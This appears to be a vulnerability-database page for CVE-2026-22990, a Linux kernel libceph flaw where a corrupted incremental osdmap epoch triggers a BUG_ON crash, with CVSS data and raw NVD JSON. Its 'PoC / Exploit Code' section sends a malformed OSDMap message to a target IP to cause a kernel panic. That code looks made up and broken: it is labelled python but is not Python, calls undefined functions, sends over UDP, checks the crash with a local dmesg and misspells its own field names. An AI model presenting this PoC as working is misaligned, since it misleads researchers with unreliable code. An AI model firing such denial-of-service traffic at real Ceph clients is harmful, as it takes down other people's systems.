Security Vulnerability Report
中文
CVE-2026-22990 CVSS 7.5 HIGH

CVE-2026-22990

Published: 2026-01-23 16:15:55
Last Modified: 2026-04-27 14:16:28
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() If the osdmap is (maliciously) corrupted such that the incremental osdmap epoch is different from what is expected, there is no need to BUG. Instead, just declare the incremental osdmap to be invalid.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel libceph (all versions prior to fix)
Ceph distributed storage system with vulnerable kernel modules

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-22990 PoC - Malformed incremental OSD map triggering kernel BUG_ON // This PoC demonstrates the concept of sending a corrupted osdmap epoch // Note: Actual exploitation requires access to Ceph cluster communication // Simulated corrupted incremental OSD map structure function createCorruptedIncrementalOSDMap() { return { epoch: 999999, // Maliciously high epoch number expected_epoch: 1, // Different from expected value osd_features: 0xFF, osd_addr: { primary: "0.0.0.0:6800", cluster_addr: "0.0.0.0:6801" }, crushmap: "CORRUPTED_CRUNSH_DATA" }; } // Send corrupted osdmap to trigger BUG_ON in osdmap_apply_incremental() function triggerVulnerability(targetIP) { const corruptedMap = createCorruptedIncrementalOSDMap(); // Construct malicious Ceph OSDMap message const message = Buffer.alloc(1024); message.writeUInt32LE(0x01, 0); // Message type: CEPH_MSG_OSDMAP message.writeUInt32LE(corruptedMap.epoch, 4); // Corrupted epoch message.writeUInt32LE(corruptedMap.expected_epoch, 8); // Expected epoch // Send to target Ceph client/server sendUDPPacket(targetIP, 6789, message); console.log("[+] Malformed OSD map sent to trigger BUG_ON"); console.log("[*] Expected epoch:", corruptedMap.expected_epoch); console.log("[*] Malicious epoch:", corruptedMap.epoch); } // Monitor for kernel panic indicators function monitorCrash(targetIP) { // Check for kernel oops/panic messages const dmesg = executeCommand("dmesg | tail -50"); if (dmesg.includes("BUG_ON") || dmesg.includes("kernel panic")) { console.log("[!] System crash detected - vulnerability confirmed"); return true; } return false; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22990", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:55.077", "lastModified": "2026-04-27T14:16:27.963", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nlibceph: reemplazar el BUG_ON excesivo en osdmap_apply_incremental()\n\nSi el osdmap está (maliciosamente) corrupto de tal manera que la época del osdmap incremental es diferente de lo que se espera, no hay necesidad de BUG. En su lugar, simplemente declarar el osdmap incremental como inválido."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.34.1", "versionEndExcluding": "5.10.248", "matchCriteriaId": "40C41FEA-994B-4964-8F5A-C7E2E24BBC05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.198", "matchCriteriaId": "82159CAA-B6BA-43C6-85D8-65BDBC175A7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.161", "matchCriteriaId": "E135B7E2-61FC-4DC1-8570-ABD67894FFDE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.121", "matchCriteriaId": "BB7A164B-7422-4A1C-82FB-5FCAEE53C06C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.66", "matchCriteriaId": "F72B884C-B44F-40E4-9895-CE421AC663D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.6", "matchCriteriaId": "879529BC-5B4C-4EBE-BF1D-1A31404A8B2E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.34:-:*:*:*:*:*:*", "matchCriteriaId": "A3B1BC1D-ED46-4364-A1D9-1FA74182B03A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.34:rc2:*:*:*:*:*:*", "matchCriteriaId": "86D3F64C-3F27-43E0-B0D4-62CE1E1F4EFB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.34:rc3:*:*:*:*:*:*", "matchCriteriaId": "7927713B-5EB0-41EB-86A9-9935775162E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.34:rc4:*:*:*:*:*:*", "matchCriteriaId": "59037296-3143-4FBB-AFF7-D4FE2C85502F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.34:rc5:*:*:*:*:*:*", "matchCriteriaId": "9CA27FD5-7DBF-4C85-80A9-D523B2E4B033"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.34:rc6:*:*:*:*:*:*", "matchCriteriaId": "9711E333-A8E7-4F4B-BCFD-2023E889651A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.34:rc7:*:*:*:*:*:*", "matchCriteriaId": "E04D3358-973B-42A1-8E08-2E3AE947193C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "1358 ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.